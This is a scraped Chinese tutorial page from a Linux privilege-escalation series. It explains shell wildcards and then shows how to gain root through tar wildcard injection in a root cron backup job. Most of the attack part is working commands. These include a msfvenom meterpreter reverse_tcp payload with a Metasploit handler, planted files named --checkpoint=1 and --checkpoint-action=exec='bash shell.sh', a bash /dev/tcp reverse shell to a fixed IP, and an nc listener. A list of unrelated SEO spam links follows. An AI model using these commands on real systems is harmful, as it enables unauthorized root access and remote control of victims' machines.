当前位置: 首页 > news >正文

镇江网站建设制作梅州网络推广

镇江网站建设制作,梅州网络推广,外包优化是什么意思,哈尔滨政府网站的建设历程系列文章 操作系统权限提升(十八)之Linux提权-内核提权 操作系统权限提升(十九)之Linux提权-SUID提权 操作系统权限提升(二十)之Linux提权-计划任务提权 操作系统权限提升(二十一)之Linux提权-环境变量劫持提权 操作系统权限提升(二十二)之Linux提权-SUDO滥用提权 利用通配符…

系列文章

操作系统权限提升(十八)之Linux提权-内核提权
操作系统权限提升(十九)之Linux提权-SUID提权
操作系统权限提升(二十)之Linux提权-计划任务提权
操作系统权限提升(二十一)之Linux提权-环境变量劫持提权
操作系统权限提升(二十二)之Linux提权-SUDO滥用提权

利用通配符(WS)进行提权

利用通配符(WS)进行提权原理

接下来介绍一个非常有趣而又古老的技术通配符注入提权

首先先看下什么是通配符

在LINUX中通配符可以被用来模糊匹配,而且通配符的输入是由当前用户的shell去进行解析

* 代表任意数量的字符? 字符代表单个字符[] 匹配中括号中的任意单一字符 可以使用连字符-表示范围,比如[0-9]

我们在当前的目录创建几个文本,1.txt,2.txt,3.txt

在这里插入图片描述
接下来使用通配符去查看文件 ls ?.txt 可以查到 一个字符后面加.txt的文件

在这里插入图片描述

我们在当前目录在创建几个文件,a.txt,ab.txt,abc.txt

在这里插入图片描述

然后使用?进行匹配,可以看到?可以匹配单个字符

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

使用*进行匹配,代表任意的多个字符

在这里插入图片描述

使用ls [0-9].txt,匹配0-9数字的txt

在这里插入图片描述
[...] 匹配方括号之中的任意一个字符

在这里插入图片描述

接下来看一下什么是Wildcard wildness简称WS

我们先创建3个文件

echo "1" > file1
echo "2" >file2
echo "3" > --help

在这里插入图片描述

接下来查看文件里面的内容,发现文件1和文件2都可以查看,但是–help查看不了,直接调出了–help的命令,这种类型的技巧称为Wildcard wildness。

在这里插入图片描述

这时如果我们执行 ls * 那么就会执行 ls --help

在这里插入图片描述

如何利用这一点进行提权呢?大家和思考一下

如果有的命令的参数中可以去执行linux命令,我们进行劫持,达到提权的目的,我们以tar命令为例子

tar命令是Linux中的压缩命令,可以对文件进行压缩

tar -czf html.tgz 1.html #将文件1.html文件压缩成html.tgz

在这里插入图片描述
在这里插入图片描述

也可以使用通配符进行压缩

tar -czf html.tgz *.html #将文件所有html文件压缩成html.tgz

在这里插入图片描述
在这里插入图片描述

在tar中有执行linux命令的参数如下

tar -czf 1.tgz 1.html --checkpoint=1 --checkpoint-action=exec=whoami

在这里插入图片描述

可以对后面的命令进行劫持 ,只需要要编写一个这样的参数文件就行可以了

echo " " > --checkpoint=1
echo " " > --checkpoint-action=exec=whoami

在这里插入图片描述

接着运行 tar -czf html.tgz *

在这里插入图片描述

提权准备

一般都有备份网站的习惯,那么运维人员或管理员填写了备份文件的计划任务任务,如果滥用了通配符,就可能导致提权

*/1 * * * * root tar -cvf /var/html.tgz /var/www/html/ *

在这里插入图片描述

提权实战

首先上线MSF

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.41.211 LPORT=8888 -f elf > mshell.elfuse exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.41.211
set lport 8888
run

在这里插入图片描述

查看计划任务,发现有滥用通配符的,并且是root权限,可以进行提权

cat /etc/crontab

在这里插入图片描述

在/var/www/html下创建两个文件如下

echo " " > /var/www/html/--checkpoint=1
echo " " > /var/www/html/--checkpoint-action=exec='bash shell.sh'
echo "bash -i >& /dev/tcp/192.168.41.211/8888 0>&1" >> /var/www/html/shell.sh

在这里插入图片描述

使用NC进行监听,等待sh脚本被执行,连接NC

nc -lvvp 8888

在这里插入图片描述

http://www.tj-hxxt.cn/news/87597.html

相关文章:

  • 做预定网站的作用百度推广外推联系方式
  • 网站开发需要用到java吗长沙网站制作公司哪家好
  • 两学一做知识竞赛网站怎么创建网站赚钱
  • 长沙哪些公司做网站谷歌浏览器官网
  • 做艺术品拍卖的网站独立站谷歌seo
  • 东莞网站建设销售前景怎么样seo属于什么
  • 网站做实名认证如何制作网站最简单的方法
  • wordpress怎么取消谷歌字体上海百度首页优化
  • 外贸网站改版公司哪家好西安seo工作室
  • 怎么用织梦做本地网站无锡seo网站管理
  • 神州顺利办深一做网站站长工具无忧
  • 网站建设单位seo引擎优化方案
  • 成都网站制作scgckj河南网站排名
  • 蜘蛛云建网站怎样一个完整的策划案范文
  • 银川做企业网站搜狗指数官网
  • 网站建设设惠州seo招聘
  • 想做水果外卖怎么做网站一站式网络推广服务
  • 拟采用建站技术贴吧友情链接在哪
  • 安顺网站开发互联网推广员是做什么
  • 顺丰电子商务网站建设学生制作个人网站
  • 案例 网站大一网页设计作业成品
  • 昆明企业为什么要做网站seo推广软
  • 广西住房和城乡建设厅官网桂建云seo01
  • iis网站连接数公司网络推广服务
  • 手机网站建设方案某个产品营销推广方案
  • 公司网站建设需推广外链平台
  • 学做标书网站怎么建网站免费的
  • 门户网站维护怎么做域名解析ip地址
  • 网站建设时时彩网站优化关键词
  • wps的ppt做网站超链接网络营销战略的内容